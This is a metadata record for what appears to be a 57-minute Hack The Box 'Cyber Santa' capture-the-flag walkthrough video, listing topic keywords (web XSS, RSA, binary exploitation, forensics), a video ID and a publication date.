Keywords: Cyber Santa, HackTheBox, Hack The Box, HTB, Capture The Flag, CTF, base64, PCAP, Wireshark, traffic analysis, APT, XSS, puppeteer, steal cookie, RSA, common modulus, RsaCTFTool, buffer overflow, ret2win, binary exploitation, pwn, exploit, pwntools, pwndbg, GDB, checksec, canary, PIE, GOT, libc, python, strace, ltrace, debugging, static analyis, dynamic analysis, offsec, radare, r2, crypto, reversing, forensics, DFIR, ethical hacking, web exploit, pentesting, pen-test, bug bounty, writeup, cyberchef, GCHQ, NSA, IDA, xmas

Id: 20FkOdoMiRU

Channel Id: undefined

Length: 57min 24sec (3444 seconds)

Published: Sun Dec 05 2021